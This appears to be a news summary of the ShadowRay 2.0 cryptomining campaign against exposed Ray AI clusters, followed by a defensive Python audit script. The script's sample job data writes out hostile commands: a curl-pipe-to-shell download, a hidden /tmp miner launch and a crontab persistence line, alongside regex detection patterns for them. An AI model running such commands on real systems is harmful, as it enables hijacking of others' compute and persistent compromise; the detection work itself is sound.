Security researchers at the Sysdig Threat Research Team (TRT) have identified a malware campaign named ShadowRay 2.0. This campaign targets publicly exposed Ray artificial intelligence (AI) computing clusters, compromising them to form a cryptomining botnet.
The attackers exploit a known remote code execution (RCE) vulnerability within the Ray framework, an open-source platform designed for scaling AI and Python applications. The campaign specifically preys on Ray clusters that have been configured without authentication and are accessible via the public internet. Sysdig’s research found more than 1,100 Ray clusters exposed online that were vulnerable to this type of attack.
Attack Vector and Deployment
The ShadowRay 2.0 attack begins by scanning the internet for exposed Ray clusters. Once a vulnerable cluster is found, the attackers submit a malicious “job” to it. This job contains commands that download and execute a cryptomining payload. The primary payload used in this campaign is XMRig, a well-known miner for the Monero (XMR) cryptocurrency. The name “ShadowRay” was given because the malicious jobs run in the background, consuming the powerful resources of the AI cluster for the attacker’s financial gain. To ensure the malware remains active on the compromised system, it establishes persistence through the use of cron jobs.
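As an added defensive example (not from the Sysdig report or the Ray project), the following Python audits a Ray cluster's job list for the behaviour described above: entrypoints that download and execute remote code, install cron persistence, drop a hidden binary under /tmp, or carry miner arguments. It assumes the listing was exported from the Ray Jobs API (GET /api/jobs/ on the dashboard port; the endpoint and field names are assumptions to verify against your Ray version) and runs here on a constructed sample.

```python
import json
import re

# Constructed sample shaped like a Ray Jobs API listing (GET /api/jobs/ on the
# dashboard port), trimmed to the fields the check uses. All values are made up.
SAMPLE_JOBS_JSON = """[
  {"submission_id": "raysubmit_a1", "status": "RUNNING",
   "entrypoint": "python train.py --epochs 10"},
  {"submission_id": "raysubmit_b2", "status": "SUCCEEDED",
   "entrypoint": "curl -s http://203.0.113.10/x.sh | sh"},
  {"submission_id": "raysubmit_c3", "status": "RUNNING",
   "entrypoint": "bash -c 'wget http://203.0.113.10/x -O /tmp/.x && chmod +x /tmp/.x && nohup /tmp/.x --coin monero &'"},
  {"submission_id": "raysubmit_d4", "status": "SUCCEEDED",
   "entrypoint": "(crontab -l; echo '* * * * * /tmp/.x') | crontab -"}
]"""

# Indicator patterns for the campaign behaviour: a job entrypoint that fetches
# and runs remote code, writes cron persistence, drops a hidden binary under
# /tmp, or carries miner-specific arguments (XMRig / Monero / stratum pool).
INDICATORS = [
    ("download_and_execute",
     re.compile(r"\b(curl|wget)\b[^|;&]*(\|\s*(ba)?sh\b|&&\s*chmod\s+\+x)")),
    ("cron_persistence", re.compile(r"\bcrontab\b|/etc/cron")),
    ("hidden_tmp_binary", re.compile(r"/tmp/\.[A-Za-z0-9_]")),
    ("miner_keyword", re.compile(r"\bxmrig\b|--coin\s+monero|stratum\+tcp", re.I)),
]


def flag_jobs(jobs_json: str) -> dict:
    """Return {submission_id: [indicator names]} for every job whose entrypoint
    trips at least one indicator; jobs with no hits are omitted."""
    findings = {}
    for job in json.loads(jobs_json):
        entrypoint = job.get("entrypoint", "")
        hits = [name for name, pat in INDICATORS if pat.search(entrypoint)]
        if hits:
            findings[job["submission_id"]] = hits
    return findings


if __name__ == "__main__":
    for sid, hits in flag_jobs(SAMPLE_JOBS_JSON).items():
        print(f"{sid}: {', '.join(hits)}")
```

A hit on a cluster that should only ever run training or serving scripts is a strong signal that the cluster accepted an unauthenticated job submission and warrants isolating the node and checking its crontab.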
Security Recommendations and Mitigation
The core issue enabling these attacks is the misconfiguration of Ray clusters, leaving them unsecured and open to the internet. Anyscale, the company that maintains the Ray framework, has published security guidance for users. The official recommendations state that Ray is not intended to be exposed directly to the public internet and that administrators should implement proper network security controls, such as firewalls, and utilize authentication features to protect their clusters from unauthorized access and exploitation.
Source: https://www.darkreading.com/cyber-risk/shadowray-20-ai-clusters-crypto-botnets